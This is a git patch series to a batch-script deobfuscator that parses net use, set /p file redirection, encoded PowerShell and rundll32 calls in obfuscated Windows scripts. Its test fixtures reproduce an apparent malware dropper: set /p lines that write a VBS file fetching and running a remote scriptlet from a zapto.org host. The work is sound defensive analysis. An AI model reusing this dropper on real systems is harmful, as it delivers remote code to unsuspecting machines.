From e8a9ed37c35a034024b0e7329c1748125d09b9f6 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 2 Jan 2024 19:54:08 +0000 Subject: [PATCH 01/17] Handle net-use --- batch_deobfuscator/batch_interpreter.py | 45 +++++++++++++++++++++++-- 1 file changed, 43 insertions(+), 2 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index e15275c..7596dab 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -307,7 +307,6 @@ def get_commands(self, logical_line): yield part def get_value(self, variable): - str_substitution = ( r"([%!])(?P[\"^|!\w#$'()*+,-.?@\[\]`{}~\s+]+)" r"(" @@ -623,6 +622,46 @@ def interpret_copy(self, cmd): self.traits["windows-util-manipulation"].append((cmd, {"src": src, "dst": dst})) self.modified_filesystem[dst.lower()] = {"type": "file", "src": src} + def interpret_net(self, cmd): + if cmd[:7].lower() != "net use": + # Started with "net" but not "net use", strange but not what we're interested into + return + r""" + net use + [{ | *}] + [\\\[\]] + [{ | *}]] + [/user:[\] + [/user:[\]] + [/user: [] + [/savecred] + [/smartcard] + [{/delete | /persistent:{yes | no}}] + net use [ [/home[{ | *}] [/delete:{yes | no}]] + net use [/persistent:{yes | no}] + """ + split_cmd = cmd.split() + if len(split_cmd) <= 2 or split_cmd[2] == "*" or split_cmd[2][:2].lower() == "/p": + # Maybe a "net use * /d /y" or a "net use /persistent:yes" + return + + info = {"devicename": split_cmd[2], "server": split_cmd[3]} + for param in split_cmd[4:]: + if param.startswith("/sa"): + continue + elif param.startswith("/sm"): + continue + elif param.startswith("/d"): + continue + elif param.startswith("/p"): + continue + elif param.startswith("/u"): + info["user"] = param.split(":", 1)[1] + continue + info["password"] = param + + self.traits["net-use"].append((cmd, info)) + def interpret_command(self, normalized_comm): if line_is_comment(normalized_comm): return @@ -724,6 +763,9 @@ def interpret_command(self, normalized_comm): if command == "copy": self.interpret_copy(normalized_comm) + if command == "net": + self.interpret_net(normalized_comm) + def valid_percent_tilde(self, argument): return argument == "%" or (argument.startswith("%~") and all(x in "fdpnxsatz" for x in argument[2:])) @@ -1063,7 +1105,6 @@ def handle_bat_file(deobfuscator, fpath): deobfuscator = BatchDeobfuscator() if args[0].file is not None: - file_path = args[0].file for logical_line in deobfuscator.read_logical_line(args[0].file): From 58dadfd6339d415a7f026ed71b4a9a146160e05b Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 30 Jan 2024 15:39:43 +0000 Subject: [PATCH 02/17] Do not handle net user --- batch_deobfuscator/batch_interpreter.py | 4 ++-- tests/test_net.py | 11 +++++++++++ 2 files changed, 13 insertions(+), 2 deletions(-) create mode 100644 tests/test_net.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 7596dab..3bacdad 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -623,8 +623,8 @@ def interpret_copy(self, cmd): self.modified_filesystem[dst.lower()] = {"type": "file", "src": src} def interpret_net(self, cmd): - if cmd[:7].lower() != "net use": - # Started with "net" but not "net use", strange but not what we're interested into + if cmd[:7].lower() != "net use" or cmd[:8].lower() == "net user": + # Started with "net" but not "net use", not what we're interested into return r""" net use diff --git a/tests/test_net.py b/tests/test_net.py new file mode 100644 index 0000000..8349cb0 --- /dev/null +++ b/tests/test_net.py @@ -0,0 +1,11 @@ +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_net_user(): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command("net user") + assert len(deobfuscator.traits) == 0 + deobfuscator.interpret_command("net user guest") + assert len(deobfuscator.traits) == 0 + deobfuscator.interpret_command("net user administrator") + assert len(deobfuscator.traits) == 0 From 2a01dd291cc1ec3c86627211b503038a612138a5 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 21 Feb 2024 12:39:05 +0000 Subject: [PATCH 03/17] Handle powershell command without argument --- batch_deobfuscator/batch_interpreter.py | 3 +++ tests/test_powershell.py | 1 + 2 files changed, 4 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 3bacdad..8b35e9f 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -500,6 +500,9 @@ def interpret_powershell(self, normalized_comm): # Assume the first element is the call to powershell cmd = normalized_comm.split()[1:] + if len(cmd) == 0: + return + if cmd[0].lower() in ["invoke-webrequest", "iwr"]: # Parse this more similarly to curl than proper powershell args, unknown = self.powershell_invoke_webrequest_parser.parse_known_args(cmd[1:]) diff --git a/tests/test_powershell.py b/tests/test_powershell.py index be84221..5a7dd1e 100644 --- a/tests/test_powershell.py +++ b/tests/test_powershell.py @@ -36,6 +36,7 @@ "powershell -Command \"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}\" > \"%WORKINGDIRONEDRIVE%\\OneDriveElevated.txt\"", b"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}", ), + ("powershell", None), ], ) def test_extract_powershell(statement, extracted_ps1): From 2d0dd283eb52344ec8c46edb89926640c942c4ea Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Mon, 11 Mar 2024 19:51:09 +0000 Subject: [PATCH 04/17] Better setp redirector handling --- batch_deobfuscator/batch_interpreter.py | 53 ++++++++------- tests/test_setp.py | 85 +++++++++++++++++++++++++ tests/test_unittests.py | 16 ----- 3 files changed, 116 insertions(+), 38 deletions(-) create mode 100644 tests/test_setp.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 8b35e9f..2b3ade3 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -17,6 +17,7 @@ ENC_RE = rb"(?i)(?:-|/)e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?)?)?)?)?)?)?)?$" PWR_CMD_RE = rb"(?i)(?:-|/)c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?$" PWR_FILE_RE = rb"(?i)(?:-|/)f(?:i(?:l(?:e?)?)?)?$" +REDIRECTORS_RE = r"\s*(<|\d?>>?)\s*(\"(?:[^\"]|\"\"|\^\")+\"|[^\s><]+)" # Gathered from https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2 RARE_LOLBAS = [ @@ -380,6 +381,8 @@ def interpret_set(self, cmd): elif char == "^": old_state = state state = "escape" + elif char == "=": + state = "value" else: state = "var" var_name += char @@ -436,31 +439,37 @@ def interpret_set(self, cmd): var_value = f"({var_value.strip(' ')})" elif option == "p": last_quote_index = max(var_value.rfind("'"), var_value.rfind('"')) - set_in = var_value.rfind("<") - set_out = var_value.rfind(">") - - if set_out != -1 and set_out > last_quote_index: - file_redirect = var_value[set_out:].lstrip(">").strip() - content = var_value[:set_out].strip() - if set_in != -1 and set_in < set_out: - content = var_value[:set_in].strip() - elif set_in > set_out: - file_redirect = file_redirect[: set_in - set_out - 1] - if content[0] == content[-1] in ["'", '"']: - content = content[1:-1].strip() - file_redirect = file_redirect.strip() - self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} - self.traits["setp-file-redirection"].append((cmd, file_redirect)) - - if set_in == -1 or set_in < last_quote_index: + file_redirect = None + file_input = None + redirectors_string = var_value[last_quote_index + 1 :].strip() + if redirectors_string: + while redirector := re.match(REDIRECTORS_RE, redirectors_string): + if redirector.group(1) in ["1>", ">"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = False + elif redirector.group(1) in ["1>>", ">>"]: + file_redirect = redirector.group(2).strip() + file_redirect_append = True + elif redirector.group(1) == "<": + file_input = redirector.group(2).strip() + redirectors_string = redirectors_string[redirector.end() :] + + if file_redirect: + content = var_value[: last_quote_index + 1].strip() + if content and file_redirect != "nul": + if content[0] == content[-1] in ["'", '"']: + content = content[1:-1] + if file_redirect_append: + if file_redirect.lower() in self.modified_filesystem: + content = f"{self.modified_filesystem[file_redirect.lower()]['content']}{content}" + self.modified_filesystem[file_redirect.lower()] = {"type": "content", "content": content} + self.traits["setp-file-redirection"].append((f"set{cmd}", file_redirect)) + + if file_input is None: var_value = "__input__" else: # We can recover the value right away - actual_value = var_value[set_in:].lstrip("<") - if set_out > set_in: - actual_value = actual_value[: set_out - set_in - 1] - actual_value = actual_value.strip() - if actual_value == "nul": + if file_input.strip() == "nul": var_value = "" else: # We could get a value from the redirection, but for the moment we'll leave it generic diff --git a/tests/test_setp.py b/tests/test_setp.py new file mode 100644 index 0000000..9226952 --- /dev/null +++ b/tests/test_setp.py @@ -0,0 +1,85 @@ +import pytest + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +@pytest.mark.parametrize( + "cmd, fs", + [ + ('set/p str="a"a" "out.txt', ["out.txt"]), + ('set/p str="a"a" "OUt.tXt', ["out.txt"]), + ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), + ('set/p str="a"a" " out.txt', ["out.txt"]), + ], +) +def test_set_redirection(cmd, fs): + deobfuscator = BatchDeobfuscator() + deobfuscator.interpret_command(cmd) + assert list(deobfuscator.modified_filesystem.keys()) == fs + if fs: + assert deobfuscator.modified_filesystem["out.txt"]["content"] == 'a"a" ' + + +def test_create_append_file(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs' + cmd2 = r'set /p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_create_append_file_with_stderr(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p="OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb" 1>C:\Users\Public\\Xdg72.vbs 2>nul' + cmd2 = r'set /p="ject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")^">>C:\Users\Public\\Xdg72.vbs 2>nul' + deobfuscator.interpret_command(cmd1) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 1 + assert deobfuscator.traits["setp-file-redirection"][0] == ( + cmd1, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetOb', + } + deobfuscator.interpret_command(cmd2) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["setp-file-redirection"]) == 2 + assert deobfuscator.traits["setp-file-redirection"][1] == ( + cmd2, + r"C:\Users\Public\\Xdg72.vbs", + ) + assert deobfuscator.modified_filesystem[r"C:\Users\Public\\Xdg72.vbs".lower()] == { + "type": "content", + "content": r'OO1v38=".":hFZJ41="ri":eWp10="g":TpBqgV66=":":GetObject("sC"+hFZJ41+"pt"+TpBqgV66+"ht"+"Tps"+TpBqgV66+"//sub"+OO1v38+"zapto"+OO1v38+"org//"+eWp10+"1")', + } + + +def test_empty_content(): + deobfuscator = BatchDeobfuscator() + cmd1 = r'set /p pidvalue=<"C:\TEMP\~pid.txt" >nul 2>nul' + deobfuscator.interpret_command(cmd1) + assert deobfuscator.variables["pidvalue"] == "__input__" diff --git a/tests/test_unittests.py b/tests/test_unittests.py index ac2c4fb..07cfdfc 100644 --- a/tests/test_unittests.py +++ b/tests/test_unittests.py @@ -720,22 +720,6 @@ def test_anti_recursivity_with_quotes(): assert cmd2 == 'echo a\\"a' - @staticmethod - @pytest.mark.parametrize( - "cmd, fs", - [ - ('set/p str="a"a" "out.txt', ["out.txt"]), - ('set/p str="a"a" "OUt.tXt', ["out.txt"]), - ('set/p str="a"a" ">out.txtout.txt', ["out.txt"]), - ('set/p str="a"a" " Date: Thu, 14 Mar 2024 18:06:28 +0000 Subject: [PATCH 05/17] Net use without devicename --- batch_deobfuscator/batch_interpreter.py | 36 ++++++++--- tests/test_net.py | 79 +++++++++++++++++++++++++ 2 files changed, 107 insertions(+), 8 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 2b3ade3..d1d1161 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -657,20 +657,40 @@ def interpret_net(self, cmd): # Maybe a "net use * /d /y" or a "net use /persistent:yes" return - info = {"devicename": split_cmd[2], "server": split_cmd[3]} - for param in split_cmd[4:]: - if param.startswith("/sa"): + info = {"options": []} + extra_params = [] + for param in split_cmd[2:]: + param_lowercase = param.lower() + if param_lowercase.startswith("/sa"): + info["options"].append("savecred") continue - elif param.startswith("/sm"): + elif param_lowercase.startswith("/sm"): + info["options"].append("smartcard") continue - elif param.startswith("/d"): + elif param_lowercase.startswith("/d"): + info["options"].append("delete") continue - elif param.startswith("/p"): + elif param_lowercase.startswith("/p"): + info["options"].append("persistent") continue - elif param.startswith("/u"): + elif param_lowercase.startswith("/u"): info["user"] = param.split(":", 1)[1] continue - info["password"] = param + + extra_params.append(param) + + if extra_params[0] == "*" or re.match(r"\w:$", extra_params[0]): + info["devicename"] = extra_params.pop(0) + if extra_params: + info["server"] = extra_params.pop(0) + if extra_params: + info["password"] = extra_params.pop(0) + + if extra_params: + raise Exception(f"Too many parameters in net use: '{cmd}'") + + if not info["options"]: + info.pop("options") self.traits["net-use"].append((cmd, info)) diff --git a/tests/test_net.py b/tests/test_net.py index 8349cb0..717e353 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -9,3 +9,82 @@ def test_net_user(): assert len(deobfuscator.traits) == 0 deobfuscator.interpret_command("net user administrator") assert len(deobfuscator.traits) == 0 + + +def test_net_use_user_password(): + deobfuscator = BatchDeobfuscator() + cmd = "net use Q: https://webdav.site.com passw'd /user:username@site.com" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Q:", + "server": "https://webdav.site.com", + "password": "passw'd", + "user": "username@site.com", + }, + ) + + +def test_net_use_user(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use d: \\server\share /user:Accounts\User1" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "d:", + "server": r"\\server\share", + "user": r"Accounts\User1", + }, + ) + + +def test_net_use_no_devicename(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE C:\TEMP\STUFF" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + print(deobfuscator.traits) + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "server": r"C:\TEMP\STUFF", + }, + ) + + +def test_net_use_delete(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE X: /DELETE" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "X:", + "options": ["delete"], + }, + ) + + +def test_net_use_delete_with_server(): + deobfuscator = BatchDeobfuscator() + cmd = r"net use f: \\financial\public /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "f:", + "server": r"\\financial\public", + "options": ["delete"], + }, + ) From 998dcfdfab9e801c7634f8e4ec8664c0900b61de Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 14 Mar 2024 18:54:58 +0000 Subject: [PATCH 06/17] Handle corrupted rundll32 calls without following dll name --- batch_deobfuscator/batch_interpreter.py | 7 ++++++- tests/test_rundll.py | 8 ++++++++ 2 files changed, 14 insertions(+), 1 deletion(-) create mode 100644 tests/test_rundll.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index d1d1161..d56b024 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -588,8 +588,13 @@ def interpret_mshta(self, cmd): def interpret_rundll32(self, cmd): # The command is supposed to be split on "," but we're getting rid of them earlier. - # If we every fix the loss of commas, we need to fix this split. + # If we ever fix the loss of commas, we need to fix this split. split_cmd = cmd.split(" ") + + if len(split_cmd) == 1: + # Rundll call without a dll, probably from a corrupted file + return + if split_cmd[1].lower() in self.modified_filesystem: rundll_struct = {} if self.modified_filesystem[split_cmd[1].lower()]["type"] == "download": diff --git a/tests/test_rundll.py b/tests/test_rundll.py new file mode 100644 index 0000000..f805bd0 --- /dev/null +++ b/tests/test_rundll.py @@ -0,0 +1,8 @@ +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +def test_dry_rundll32(): + deobfuscator = BatchDeobfuscator() + cmd = r"$WINSYSDIR$\RunDLL32.exe" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 From 298dae6bfca59b7006493636f3411636bf6013b8 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 26 Mar 2024 18:51:50 +0000 Subject: [PATCH 07/17] Avoid corrupted net use calls --- batch_deobfuscator/batch_interpreter.py | 7 +++++++ tests/test_net.py | 11 +++++++++++ 2 files changed, 18 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index d56b024..3d2331d 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -684,6 +684,13 @@ def interpret_net(self, cmd): extra_params.append(param) + if not extra_params: + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + return + if extra_params[0] == "*" or re.match(r"\w:$", extra_params[0]): info["devicename"] = extra_params.pop(0) if extra_params: diff --git a/tests/test_net.py b/tests/test_net.py index 717e353..3b3819d 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -88,3 +88,14 @@ def test_net_use_delete_with_server(): "options": ["delete"], }, ) + + +def test_net_use_missing_var(): + # Probably something like + # net use %UNKNOWN_VAR% /delete + # Which gets resolved to + # net use /delete + deobfuscator = BatchDeobfuscator() + cmd = r"net use /delete" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 0 From cc5f8aef5b6dc63cbc638e9b3da133781b16fa3f Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 4 Apr 2024 16:54:25 +0000 Subject: [PATCH 08/17] Handle redirection in net use commands --- batch_deobfuscator/batch_interpreter.py | 21 ++++++++- tests/test_net.py | 62 +++++++++++++++++++++++++ 2 files changed, 81 insertions(+), 2 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 3d2331d..5ecc959 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -665,6 +665,10 @@ def interpret_net(self, cmd): info = {"options": []} extra_params = [] for param in split_cmd[2:]: + if any(param.startswith(x) for x in [">", ">>", "1>", "1>>", "2>", "2>>"]): + # We reached the redirection part of the command + break + param_lowercase = param.lower() if param_lowercase.startswith("/sa"): info["options"].append("savecred") @@ -673,14 +677,27 @@ def interpret_net(self, cmd): info["options"].append("smartcard") continue elif param_lowercase.startswith("/d"): - info["options"].append("delete") + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-delete") + else: + info["options"].append("delete") continue elif param_lowercase.startswith("/p"): - info["options"].append("persistent") + if ":" in param_lowercase and param_lowercase.split(":", 1)[1].startswith("n"): + info["options"].append("not-persistent") + else: + info["options"].append("persistent") continue elif param_lowercase.startswith("/u"): info["user"] = param.split(":", 1)[1] continue + # /y and /n looks to be undocumented confirmation silent responses + elif param_lowercase.startswith("/y"): + info["options"].append("auto-accept") + continue + elif param_lowercase.startswith("/n"): + info["options"].append("auto-decline") + continue extra_params.append(param) diff --git a/tests/test_net.py b/tests/test_net.py index 3b3819d..417519c 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -1,3 +1,5 @@ +import tempfile + from batch_deobfuscator.batch_interpreter import BatchDeobfuscator @@ -73,6 +75,18 @@ def test_net_use_delete(): }, ) + cmd = r"NET USE U: /DELETE /y" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][1] == ( + cmd, + { + "devicename": "U:", + "options": ["delete", "auto-accept"], + }, + ) + def test_net_use_delete_with_server(): deobfuscator = BatchDeobfuscator() @@ -99,3 +113,51 @@ def test_net_use_missing_var(): cmd = r"net use /delete" deobfuscator.interpret_command(cmd) assert len(deobfuscator.traits) == 0 + + +def test_net_use_redirect(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE U: \\server\files >> output.log" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "U:", + "server": r"\\server\files", + }, + ) + + +def test_net_use_script(): + deobfuscator = BatchDeobfuscator() + script = rb""" +net use w: /delete >nul 2>nul +if not exist w: ( + net use w: \\server\files /Persistent:NO >nul 2>nul + ) +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + assert "net-use" in deobfuscator.traits + assert len(deobfuscator.traits["net-use"]) == 2 + assert deobfuscator.traits["net-use"][0] == ( + r"net use w: /delete >nul 2>nul", + { + "devicename": "w:", + "options": ["delete"], + }, + ) + assert deobfuscator.traits["net-use"][1] == ( + r"net use w: \\server\files /Persistent:NO >nul 2>nul", + { + "devicename": "w:", + "server": r"\\server\files", + "options": ["not-persistent"], + }, + ) From 9af44496274954f1e466cad104a190ad459df435 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 2 May 2024 17:09:21 +0000 Subject: [PATCH 09/17] Handle piping into powershell -Encoded --- batch_deobfuscator/batch_interpreter.py | 6 ++++++ tests/test_powershell.py | 4 ++++ 2 files changed, 10 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 5ecc959..829b660 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -522,6 +522,12 @@ def interpret_powershell(self, normalized_comm): for idx, part in enumerate(cmd): if re.match(ENC_RE, part.encode()): + if len(cmd) == idx + 1: + # We do not have more arguments + # This my be caused by a script that does + # echo cHdk | powershell -Encoded + break + if cmd[idx + 1][0] in ["'", '"']: last_part = idx + 1 for i in range(last_part, len(cmd)): diff --git a/tests/test_powershell.py b/tests/test_powershell.py index 5a7dd1e..a1947be 100644 --- a/tests/test_powershell.py +++ b/tests/test_powershell.py @@ -1,3 +1,5 @@ +import tempfile + import pytest from batch_deobfuscator.batch_interpreter import BatchDeobfuscator @@ -37,6 +39,8 @@ b"& {get-process onedrive | add-member -Name Elevated -MemberType ScriptProperty -Value {if ($this.Name -in @('Idle','System')) {$null} else {-not $this.Path -and -not $this.Handle} } -PassThru | Format-Table Name,Elevated}", ), ("powershell", None), + # echo cHdk | powershell -Encoded + ("powershell -Encoded", None), ], ) def test_extract_powershell(statement, extracted_ps1): From 44268549a655449c42118309212b8182aa6fbac7 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 15 May 2024 19:21:03 +0000 Subject: [PATCH 10/17] Handle infinite recursion in variable expansion --- batch_deobfuscator/batch_interpreter.py | 7 ++++++- tests/test_variables.py | 21 +++++++++++++++++++++ 2 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 tests/test_variables.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 829b660..26560f4 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -1032,7 +1032,12 @@ def normalize_command(self, command): def analyze_logical_line(self, logical_line, working_directory, f, extracted_files): commands = self.get_commands(logical_line) for command in commands: - normalized_comm = self.normalize_command(command) + try: + normalized_comm = self.normalize_command(command) + except RecursionError: + # If a variable contains itself, we will recurse infinitly to expand it + normalized_comm = command + if len(list(self.get_commands(normalized_comm))) > 1: self.traits["command-grouping"].append({"Command": command, "Normalized": normalized_comm}) self.analyze_logical_line(normalized_comm, working_directory, f, extracted_files) diff --git a/tests/test_variables.py b/tests/test_variables.py new file mode 100644 index 0000000..6a502cb --- /dev/null +++ b/tests/test_variables.py @@ -0,0 +1,21 @@ +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 +# A Grub file that contains a batch script +# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it +def test_in_check_infinite_recursion(): + deobfuscator = BatchDeobfuscator() + script = rb""" +if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit +call Fn.11 "%in_check%" "1" && exit 1 +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + # No assert, just making sure it does not error out. From dab3c667c468bcc91d72963775734242e56158bb Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Wed, 22 May 2024 17:47:46 +0000 Subject: [PATCH 11/17] Handle spaces in net use by using shlex --- batch_deobfuscator/batch_interpreter.py | 5 ++++- tests/test_net.py | 16 ++++++++++++++++ 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 26560f4..21d7a12 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -670,11 +670,14 @@ def interpret_net(self, cmd): info = {"options": []} extra_params = [] - for param in split_cmd[2:]: + for param in shlex.split(cmd, posix=False)[2:]: if any(param.startswith(x) for x in [">", ">>", "1>", "1>>", "2>", "2>>"]): # We reached the redirection part of the command break + if param[0] == param[-1] and param[0] in ["'", '"']: + param = param[1:-1] + param_lowercase = param.lower() if param_lowercase.startswith("/sa"): info["options"].append("savecred") diff --git a/tests/test_net.py b/tests/test_net.py index 417519c..2b27846 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -130,6 +130,22 @@ def test_net_use_redirect(): ) +def test_net_use_space(): + deobfuscator = BatchDeobfuscator() + cmd = r'net use g: "\\server.local\some\path\to\a nice folder" /user:domain\username' + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "g:", + "server": r"\\server.local\some\path\to\a nice folder", + "user": r"domain\username", + }, + ) + + def test_net_use_script(): deobfuscator = BatchDeobfuscator() script = rb""" From 407941e3d2d59aeca174a5d81af494210c310221 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 23 May 2024 20:17:20 +0000 Subject: [PATCH 12/17] Fix lost space in certain obfuscated scripts --- batch_deobfuscator/batch_interpreter.py | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 21d7a12..71523f0 100644 --- 